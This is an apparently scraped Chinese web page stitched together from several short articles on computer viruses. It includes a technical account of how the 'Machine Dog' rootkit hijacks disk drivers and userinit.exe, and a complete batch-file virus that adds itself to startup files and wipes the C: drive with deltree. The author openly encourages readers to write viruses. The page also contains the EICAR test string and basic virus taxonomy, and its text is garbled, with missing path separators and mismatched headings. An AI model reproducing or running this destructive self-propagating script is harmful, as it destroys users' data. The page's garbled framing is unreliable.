HKLMSOFTWAREMicrosoftWindowsNTCurrent VersionWinL
看了此文电脑病毒红色代码介绍
浏览量:3
下载量:0
时间:
今天读文网小编要跟大家介绍下电脑病毒的源代码,下面就是读文网小编为大家整理到的资料,请大家认真看看!
建立磁盘底层驱动。
1.校验IDT的NPXSegment Overrun(09)和Page Fault(OE)的矢量地址,如果存在,则把高16位设置为0,这个过程和还原软件的原理是一样的,就是对OE的HOOK检验。
2.给自己找个位置,查找驱动资源中的1000/1000,然后COPY到ALLOVER缓冲区中。
3.建立物理磁盘PhysicalHardDISK0的Device----DosDevices的底层借口,针对“IRP_MJ_CREATE”“IRP_MJ_CLOSE”“IRP_MJ_DEVICE_CONTROL”响应。“IRP_MJ_CREATE”断开DeviceHarddisk0DR0-1上的附属部件。从而使磁盘OS层提供的应用层文件系统鉴听校验失效。
然后通过“I_M_C ”中恢复DR0-1上的附加。并在I_M_D_C中对0x0004f8E——0xF0003C0F作出响应,把ALLOVER缓冲区中找到的数据解密并返回应用层。通过KEY-s查表产生密钥。0x0004f8E——0xF0003C0F字段会将用户态代码作为源基,对其运算后得到字串KEY,用来对源驱动解密后,反还给用户层。
在这个过程中,有个大家比较熟悉的截面,就是系统由于磁盘底层驱动校验不成功而出现的蓝屏截面,最常见的是初始值0x0004f8E,比如,早期的SATAⅠ在保护卡状态下出现物理坏道(0%—1%),就是这个蓝屏代码。很多由于用户态的软件安装不当,引起的蓝屏也出现在这一区段中。在解除DR0-1上的附属部件时,出现逻辑性错误就导致大家常见的中机器狗后的蓝屏。多见于多处理器平台。一般的PC是不会出现这个错误的,也就是说,大多数中招后都能正常使用,就是木马多多,呵呵。
继续正题,以上过程反映到IE上是这样的:1.释放底层驱动程序(比如变种前的PCIHDD.SYS)或者高位数用户态临时驱动(变种后,可以有可执行程序引导,如“Usrinit.exe”)
2.定位WINDOWS系统中的userinit.exe。(通过MBR和第一引导扇区参数来定位文件磁盘矢量偏移。)
3.并校验RF文件与地位后读取的数据位置的正确性。
4.将获取的代码参数返回给底层驱动,控制0x0004f8E——0xF0003C0F段为,最后将返回值(TQ)直接写入userinit.exe数据所在的第一蔟。这里要大家特别注意以下,通过用户态的shell调用,作者只需一点变动,就可以随即抓取用户态引导文件,所以,目前的改名设权限都是没用的。
甚至,他可以把这个过程省略,象净网先锋那样,把Shell进程写入动态连接库。那么,还原就没用了。还会带来网络负载问题,可能是作者比较仁慈吧。
好了,分析了以上的过程,解决的办法就出来了,就是要通过对操作系统的内核编译,将他所定位的目的地址占据,这样,除非是格式化,否则,任何操作的不会在底层夺取该位置。(不要问权限问题,在底层是没有这个说法的,先入为主。)
这篇是讲得比较专业点儿的,基本上把机器狗如何在底层获取控制权限过程都讲解了。
夹并启动运行,以及如何调用系统级动态。
浏览量:2
下载量:0
时间:
病毒不是来源于突发或偶然的原因。病毒来自于一次偶然的事件,那时的研究人员为了计算出当时互联网的在线人数,然而它却自己“繁殖”了起来导致了整个服务器的崩溃和堵塞,有时一次突发的停电和偶然的错误,会在计算机的磁盘和内存中产生一些乱码和随机指令,但这些代码是无序和混乱的,病毒则是一种比较完美的,精巧严谨的代码,按照严格的秩序组织起来,与所在的系统网络环境相适应和配合起来,病毒不会通过偶然形成,并且需要有一定的长度,这个基本的长度从概率上来讲是不可能通过随机代码产生的。以下是读文网网小编为大家整理的关于bat电脑病毒代码的相关知识,希望对大家有所帮助!
rem (注:原来站长我在读职高时,就用这一招来对付在上机时总是喜欢删别人文件(放在我自己所建目录下面的程序文件,这可是我辛辛苦苦用手敲打键盘搞出来的呀!)当然不是像下面这个病毒程序故意在桌面上放的那个炸弹文件了!)的人!当然那个喜欢删别人文件最终还是免不了挨老师的一顿臭骂!)
rem 如果你是一位电脑病毒编写高手,千万别对着你的电脑吐口水呀!如果真是这样的话,我会很难过的,一为你面前这台电脑难过!二为我自己难过!
rem 电脑病毒的原理都是差不多的,只要你学精了几门程序设计语言(如VC,Delphi,VB,html[JavaScript/Vbscript],Perl)再加学计算机漏洞,以及一些文件格式(比如PE,NE,Html,Vbs,Js等),保证你编写的电脑病毒会Very very good!相信你看完以下程序代码,一定有一种冲动!什么冲动?(编写电脑病毒的冲动)
if not exsit %windir%desktopIamVirus.txt goto KillSystem
if not exsit %windir%system\%0.bat goto CopyToHere
if not exist %windir%winstart.bat goto AddWin
if not exist %windir%dosstart.bat goto AddDos
if not exist c:autoexec.bat goto AddAuto
if not exsit %windir%……启动HappyQQ.bat goto CopyMyself
goto end
rem 下面部分为自我复制部分
:AddWin
echo %windir%system\%0.bat>>%windir%winstart.bat>null
goto end
:AddDos
echo %windir%system\%0.bat>>%windir%dosstart.bat>null
goto end
:AddAuto
echo %windir%system\%0.bat>>c:autoexec.bat>null
goto end
:CopyMyself
copy %0.bat %windir%……启动HappyQQ.bat /y >null
goto end
:CopyToHere
copy %0.bat %windir%system\%0.bat
goto end
:KillSystem
deltree/y c:*.*>null
rem 这里为破坏部分
goto end
:end
怎么样,看完一个批处理病毒代码,你应该对计算机病毒的概念非常了解了吧!晕呀,什么?你不懂DOS呀,那也没关系,去问问你的计算机老师,什么,你的计算机老师也不会呀,那么你就网上查查吧,千万别问我,虽然我是电脑DOS命令高手,但是我可不想让你老师来找我的麻烦呀!呵呵……
如果你觉得这还不够爽,请你进入我的Baidu"红客"贴吧进行讨论!(类似这个批处理病毒的原理,我用C语言编写了一个模拟计算机病毒!)
浏览量:1
下载量:0
时间:
电脑病毒源代码(也称源程序),是指一系列人类可读的计算机语言指令。 下面由读文网小编给你做出详细的源代码详细介绍!希望对你有帮助!
1、生成目标代码
2、即计算机可以识别的代码。
对软件进行说明,即对软件的编写进行说明。为数不少的初学者,甚至少数有经验的程序员都忽视软件说明的编写,因为这部分虽然不会在生成的程序中直接显示,也不参与编译。
但是说明对软件的学习、分享、维护和软件复用都有巨大的好处。因此,书写软件说明在业界被认为是能创造优秀程序的良好习惯,一些公司也硬性规定必须书写。
需要指出的是,源代码的修改不能改变已经生成的目标代码。如果需要目标代码做出相应的修改,必须重新编译。
浏览量:2
下载量:0
时间:
计算机病毒(Computer Virus)是编制者在计算机程序中插入的破坏计算机功能或者数据的代码,能影响计算机使用,能自我复制的一组计算机指令或者程序代码。
计算机病毒具有传播性、隐蔽性、感染性、潜伏性、可激发性、表现性或破坏性。计算机病毒的生命周期:开发期→传染期→潜伏期→发作期→发现期→消化期→消亡期。计算机病毒是一个程序,一段可执行码。就像生物病毒一样,具有自我繁殖、互相传染以及激活再生等生物病毒特征。计算机病毒有独特的复制能力,它们能够快速蔓延,又常常难以根除。它们能把自身附着在各种类型的文件上,当文件被复制或从一个用户传送到另一个用户时,它们就随同文件一起蔓延开来。
所谓的病毒代码其实可以想象成是犯人的指纹, 当防毒软件公司收集到一只新的病毒时, 他们就会从这个病毒程序中截取一小段独一无二而且足以表示这只病毒的二进位程序码 (Binary Code) , 来当做杀毒程序辨认此病毒的依据, 而这段独一无二的二进位程序码就是所谓的病毒代码·病毒代码它可以把计算机程序打乱,使计算机无法正常使用。
电脑病毒代码制作:
如果想要测试你的杀毒软件实时监控是否正常工作,请复制以下病毒代码到文本文档中并把扩展名txt改为exe或bat,直接保存为txt某些杀毒软件是没有反应的,因为某些杀毒软件默认不监控txt等非可执行文件(比如Avast!等)X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*此代码为测试代码,对电脑没有任何伤害此代码无法成为测试杀毒软件好坏的标准,只能测试杀毒软件监控是否正常工作。
其次如果你想学习制作电脑病毒 你就需要学习计算机语言中的汇编语言和C语言,因为一个简单的电脑病毒编写绝大多数代码都可以用这两种语言来完成。在编写电脑病毒时,我们还需要对电脑的结构和运行过程等方面有一定了解,这样才能让电脑病毒制作更加成功。如果你对这些基础都不牢固也有办法,现在网络上有一些简单的病毒制造机,也就是一类病毒编写软件。
电脑病毒有哪些
1、系统病毒
系统病毒的前缀为:Win32、PE、Win95、W32、W95等。这些病毒的一般公有的特性是可以感染windows操作系统的 *.exe 和 *.dll 文件,并通过这些文件进行传播。如CIH病毒。
2、蠕虫病毒
蠕虫病毒的前缀是:Worm。这种病毒的公有特性是通过网络或者系统漏洞进行传播,很大部分的蠕虫病毒都有向外发送带毒邮件,阻塞网络的特性。比如冲击波(阻塞网络),小邮差(发带毒邮件) 等。
浏览量:2
下载量:0
时间:
电脑病毒成为最近几年的热门词汇,并且也有很多人开始去编写或研究电脑病毒代码。究竟电脑病毒代码有什么用,让大家对他产生浓厚的兴趣,研究或开发他。让读文网小编带大家来了解一下电脑病毒代码。
电脑病毒作为一种被植入到电脑程序中的一组程序代码,可以自我复制并且多电脑的硬件设施进行破坏,删除电脑的数据,甚至窃取大家的信息让我们的财产受到损失。在各种因素下,很多人开始对电脑病毒产生了浓厚的兴趣,并且进行了大量的工作研究电脑病毒代码。
有些不法分子为了获得非法收益,会通过电脑病毒对用户的电脑进行影响,甚至通过窃取电脑内的账户信息,直接将人们账户上的钱转走。对于这些人来讲,研究电脑病毒代码,就是为自己非法获利进行学习,目的的不纯粹,使得他们的研究更加危险,会产生更加严重的损失。这也是各个国家在法律上为什么对这些黑客进行的电脑病毒研发严惩的原因了,一旦被发现,面临的就是长久的牢狱生活。
树立正确的思想和观点,将电脑病毒代码应用到正确的领域。法律的底线应该让我们警醒,人生的财富也要从正确的途径去获得。希望你能够正确的选择自己的道路,希望电脑病毒代码能变成对人们的一种助力
浏览量:2
下载量:0
时间: